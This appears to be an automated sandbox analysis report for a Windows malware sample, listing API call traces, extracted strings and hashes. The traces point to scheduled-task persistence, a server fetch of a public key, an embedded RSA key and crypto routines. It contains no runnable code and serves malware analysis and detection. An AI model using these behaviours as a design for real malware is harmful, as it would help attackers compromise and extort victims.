• Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
Yara matches
Similarity
• API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
• String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
• API String ID: 2957410896-1250862213
• Opcode ID: d1c225ff7ba184e7beccaf816866c7dc7037880acad766481629e3625921b955
• Instruction ID: 1bc5a0f4a7b3354d894ba66b3736779f038ca3b572dd5e55f60bb7cd960c039c
• Opcode Fuzzy Hash: d1c225ff7ba184e7beccaf816866c7dc7037880acad766481629e3625921b955
• Instruction Fuzzy Hash: D9D2E2706043519BD724EF24EC56B9FB7E5BF84304F00092DF48597292EB79EA48EB92
Uniqueness

Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00F91983
                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00F91994
                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00F919A1
                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00F919AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00F919E8
                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00F919FB
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00F91A2D
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00F91A81
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91AC5
                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00F91ADB
                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00F91AEE
                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00F91B01
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91C15
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00F91C36
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00F91C50
                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00F91C63
                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00F91C76
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91D45
                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00F91D73
                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00F91D86
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00F91D99
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00F91DAC
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00F91DBF
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00F91DD2
                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00F91DE5
                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00F91DF8
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00F91E0B
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00F91E1E
                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00F91E31
                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00F91E44
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F91EDD
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91F03
                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00F91F1A
                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00F91F95
                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,44DAE971), ref: 00F91FE3
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91FF1
                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00F92058
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92066
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92095
                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 00F920AA
                                                                                                        • GetTickCount.KERNEL32 ref: 00F920FB
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92118
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92187
                                                                                                        • GetTickCount.KERNEL32 ref: 00F921A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                        • Opcode ID: 9f2a7975f97b1db7cb86e954541b7f0b68e48e922d448996ed49ff5620b1aea3
                                                                                                        • Instruction ID: 0cfc96efacb8aeb276debaadf92bed526c885c4868cbd880247ad787918c4295
                                                                                                        • Opcode Fuzzy Hash: 9f2a7975f97b1db7cb86e954541b7f0b68e48e922d448996ed49ff5620b1aea3
                                                                                                        • Instruction Fuzzy Hash: 5132BFB0E0022D9AEF619F68CC45B9EB7B9FF41714F0041EAA64CE6191EB758E80DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00FDB3EC,000000FF), ref: 00F2E6C0
                                                                                                          • Part of subcall function 00F1C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F2E6D4), ref: 00F1C6C2
                                                                                                          • Part of subcall function 00F1C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                          • Part of subcall function 00F1C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EC3E
                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00F2EC51
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC6D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC7F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EC93
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2ECB3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED2A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2ED4B
                                                                                                        • _malloc.LIBCMT ref: 00F2ED55
                                                                                                        • _memset.LIBCMT ref: 00F2ED63
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00F2ED7D
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED85
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDA3
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDAE
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EDD3
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EDF7
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EE05
                                                                                                        • _free.LIBCMT ref: 00F2EE15
                                                                                                        • _free.LIBCMT ref: 00F2EE22
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EF61
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EFBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 704684250-3586605218
                                                                                                        • Opcode ID: 53b889faa83d4c1b0386d8ec859d1a9331cf7b7606e9563bd2803b4be7eff217
                                                                                                        • Instruction ID: 4207fb255e77c5eeed980dc2708253155412c975dff45614a4fb41ed8462c74c
                                                                                                        • Opcode Fuzzy Hash: 53b889faa83d4c1b0386d8ec859d1a9331cf7b7606e9563bd2803b4be7eff217
                                                                                                        • Instruction Fuzzy Hash: 15424671508351ABDB20EF24DC49B9BBBE8BF84314F14092DF48587292DB74E648DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1D26C
                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00F1D28F
                                                                                                        • CoCreateInstance.OLE32(00FE506C,00000000,00000001,00FE4FEC,?,?,00000000,000000FF), ref: 00F1D2D5
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D2F0
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D309
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D322
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D33B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D397
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3A4
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3B1
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3C2
                                                                                                        • CoUninitialize.OLE32 ref: 00F1D3D5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                        • Opcode ID: f8351e9218045c8d540af32496176720ad57129058429b0cdcdb07390c44f287
                                                                                                        • Instruction ID: 498001fc2fcb2d2b8ece050d4b8d836a28908f7ba7d63bf529af21893e918b6b
                                                                                                        • Opcode Fuzzy Hash: f8351e9218045c8d540af32496176720ad57129058429b0cdcdb07390c44f287
                                                                                                        • Instruction Fuzzy Hash: 1F529271E00219DFDB00DBA4CC58FEEBBB5BF49704F148198E505AB291DB35AE85DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00F21010
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21026
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F2103B
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21051
                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00F21059
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00F21064
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F2107A
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00F21099
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210AB
                                                                                                        • _memset.LIBCMT ref: 00F210CA
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F210DE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210F0
                                                                                                        • _malloc.LIBCMT ref: 00F21100
                                                                                                        • _memset.LIBCMT ref: 00F2110B
                                                                                                        • _sprintf.LIBCMT ref: 00F2112E
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00F2113C
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F21154
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F2115F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 2451520719-213608013
                                                                                                        • Opcode ID: 0a807248b97e10f2b10fd081de65dde7e5f03e89b8ea2ad011bbf5291af09bc5
                                                                                                        • Instruction ID: 4f4eb604ab3fcd41e926586b5c86bab999cb2c7e3d34c52e25dcb08080fb1254
                                                                                                        • Opcode Fuzzy Hash: 0a807248b97e10f2b10fd081de65dde7e5f03e89b8ea2ad011bbf5291af09bc5
                                                                                                        • Instruction Fuzzy Hash: 61518E71D40219ABDB11DBA0DC46FEFBBB9FB04714F104026FA00F6280EB795A01ABA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21ACA
                                                                                                          • Part of subcall function 00F21AB0: DispatchMessageW.USER32(?), ref: 00F21AE0
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00F1F900
                                                                                                        • _memmove.LIBCMT ref: 00F1F9EA
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F1FA51
                                                                                                        • _memmove.LIBCMT ref: 00F1FADA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        • Opcode ID: 0fd330e224efecb9876fb0f0eed36cebca2b52ea629d4f2d22157e6c0a99b9ce
                                                                                                        • Instruction ID: 8f53c32379d78565d111c0f711e72b843c251801086cca80e8aed1b708f16a25
                                                                                                        • Opcode Fuzzy Hash: 0fd330e224efecb9876fb0f0eed36cebca2b52ea629d4f2d22157e6c0a99b9ce
                                                                                                        • Instruction Fuzzy Hash: 8652DF71D00218DBDF10DFA8DC85BEEBBB4BF04318F108169E419A7251E779AA89DF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000,00000000), ref: 00F1E8CE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E8E4
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1E8F9
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E90F
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00F1E928
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E93E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F1E95D
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E96F
                                                                                                        • _memset.LIBCMT ref: 00F1E98E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1E9A2
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E9B4
                                                                                                        • _sprintf.LIBCMT ref: 00F1E9D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1084002244-213608013
                                                                                                        • Opcode ID: 8f2235fb47de2201318033d2332ac8965008be072cefe07183b5a80b62f4de23
                                                                                                        • Instruction ID: 16a4efe6fb0f14cf6100e60de2b923045c20f32cb4ed2741543724dd51d707c1
                                                                                                        • Opcode Fuzzy Hash: 8f2235fb47de2201318033d2332ac8965008be072cefe07183b5a80b62f4de23
                                                                                                        • Instruction Fuzzy Hash: E6518071D40209ABDF11DFA0DC46FEEBBB9EB04714F10402AFA01B6181D779AA45EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000,00000000,00000000,?), ref: 00F1EB01
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB17
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1EB2C
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB42
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00F1EB4E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB64
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F1EB83
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB95
